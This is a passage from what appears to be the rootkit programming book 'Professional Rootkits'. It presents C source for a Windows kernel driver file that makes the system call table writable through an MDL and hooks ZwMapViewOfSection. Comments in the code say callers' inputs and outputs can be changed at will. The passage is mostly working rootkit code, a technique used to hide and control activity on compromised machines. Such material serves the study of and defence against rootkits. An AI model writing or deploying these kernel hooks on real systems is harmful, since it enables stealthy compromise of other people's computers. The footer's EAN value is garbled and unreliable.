
The file hookManager.c has only two functions: NewZwMapViewOfSection and Hook. NewZwMapView OfSection simply calls the original ZwMapViewOfSection after displaying a quick debug statement. Hook is the crux of this chapter. This is where a writable MDL to the system call table is created and used to redirect kernel calls to our function:

  // hookManager // Copyright Ric Vieler, 2006 // Hook the System Call Table #include "ntddk.h" #include "hookManager.h" #include "Ghost.h" NTSTATUS NewZwMapViewOfSection(  IN HANDLE SectionHandle,  IN HANDLE ProcessHandle,  IN OUT PVOID *BaseAddress,  IN ULONG ZeroBits,  IN ULONG CommitSize,  IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,  IN OUT PSIZE_T ViewSize,  IN SECTION_INHERIT InheritDisposition,  IN ULONG AllocationType,  IN ULONG Protect ) {  NTSTATUS status;  DbgPrint("comint32: NewZwMapViewOfSection called.");  // we can do whatever we want with the input here  // and return or continue to the original function  status = OldZwMapViewOfSection(       SectionHandle,   ProcessHandle,   BaseAddress,   ZeroBits,   CommitSize,   SectionOffset OPTIONAL,   ViewSize,   InheritDisposition,   AllocationType,   Protect );  // we can do whatever we want with the output here  // and return any value including the actual one  return status; } NTSTATUS Hook( ) {  // Needed for HOOK_INDEX  RtlInitUnicodeString(&dllName, L"\\SystemRoot\\system32\\ntdll.dll");  pMyMDL = MmCreateMdl(NULL,   KeServiceDescriptorTable.ServiceTableBase,   KeServiceDescriptorTable.NumberOfServices * 4 );  if( !pMyMDL )   return( STATUS_UNSUCCESSFUL );  MmBuildMdlForNonPagedPool( pMyMDL );  pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;  NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );  if( !NewSystemCallTable )   return( STATUS_UNSUCCESSFUL );  // Add hooks here (remember to unhook if using DriverUnload)  HOOK( ZwMapViewOfSection, NewZwMapViewOfSection, OldZwMapViewOfSection );  return( STATUS_SUCCESS ); } 

Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

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